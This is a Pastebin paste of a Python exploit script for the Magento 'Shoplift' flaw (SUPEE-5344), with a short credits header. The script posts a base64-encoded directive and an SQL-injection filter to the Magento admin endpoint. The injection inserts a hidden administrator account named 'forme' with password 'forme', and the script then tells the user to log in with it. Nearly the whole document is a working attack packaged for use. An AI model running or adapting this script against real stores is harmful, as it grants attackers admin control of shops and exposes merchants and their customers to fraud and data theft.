SHARE
TWEET

Untitled

a guest Sep 22nd, 2016 278 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. ##################################################################################################
  2. #Exploit Title : Magento Shoplift exploit (SUPEE-5344)
  3. #Author        : Manish Kishan Tanwar AKA error1046
  4. #Date          : 25/08/2015
  5. #Love to       : zero cool,Team indishell,Mannu,Viki,Hardeep Singh,Jagriti,Kishan Singh and ritu rathi
  6. #Debugged At  : Indishell Lab(originally developed by joren)
  7. ##################################################################################################
  8.  
  9. ////////////////////////
  10. /// Overview:
  11. ////////////////////////
  12.  
  13. Magento shoplift bug originally discovered by CheckPoint team (http://blog.checkpoint.com/2015/04/20/analyzing-magento-vulnerability/)
  14. This python script developed by joren but it was having some bug because of which it was not working properly.
  15. If magento version is vulnerable, this script will create admin account with username forme and password forme
  16.  
  17.  
  18.  
  19. ////////////////
  20. ///  POC   ////
  21. ///////////////
  22. Exploit script starts here
  23. ///////////////////
  24. #Thanks to
  25. # Zero cool, code breaker ICA, Team indishell, my father , rr mam, jagriti and DON  
  26. import requests
  27. import base64
  28. import sys
  29.  
  30. target = "http://target.com/"
  31.  
  32. if not target.startswith("http"):
  33.     target = "http://" + target
  34.  
  35. if target.endswith("/"):
  36.     target = target[:-1]
  37.  
  38. target_url = target + "/admin/Cms_Wysiwyg/directive/index/"
  39.  
  40. q="""
  41. SET @SALT = 'rp';
  42. SET @PASS = CONCAT(MD5(CONCAT( @SALT , '{password}') ), CONCAT(':', @SALT ));
  43. SELECT @EXTRA := MAX(extra) FROM admin_user WHERE extra IS NOT NULL;
  44. INSERT INTO `admin_user` (`firstname`, `lastname`,`email`,`username`,`password`,`created`,`lognum`,`reload_acl_flag`,`is_active`,`extra`,`rp_token`,`rp_token_created_at`) VALUES ('Firstname','Lastname','email@example.com','{username}',@PASS,NOW(),0,0,1,@EXTRA,NULL, NOW());
  45. INSERT INTO `admin_role` (parent_id,tree_level,sort_order,role_type,user_id,role_name) VALUES (1,2,0,'U',(SELECT user_id FROM admin_user WHERE username = '{username}'),'Firstname');
  46. """
  47.  
  48.  
  49. query = q.replace("\n", "").format(username="forme", password="forme")
  50. pfilter = "popularity[from]=0&popularity[to]=3&popularity[field_expr]=0);{0}".format(query)
  51.  
  52. # e3tibG9jayB0eXBlPUFkbWluaHRtbC9yZXBvcnRfc2VhcmNoX2dyaWQgb3V0cHV0PWdldENzdkZpbGV9fQ decoded is{{block type=Adminhtml/report_search_grid output=getCsvFile}}
  53. r = requests.post(target_url,
  54.                   data={"___directive": "e3tibG9jayB0eXBlPUFkbWluaHRtbC9yZXBvcnRfc2VhcmNoX2dyaWQgb3V0cHV0PWdldENzdkZpbGV9fQ",
  55.                         "filter": base64.b64encode(pfilter),
  56.                         "forwarded": 1})
  57. if r.ok:
  58.     print "WORKED"
  59.     print "Check {0}/admin with creds forme:forme".format(target)
  60. else:
  61.     print "DID NOT WORK"
  62.  
  63.  
  64.  
  65.  
  66.  
  67. /////////////////
RAW Paste Data
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
 
Top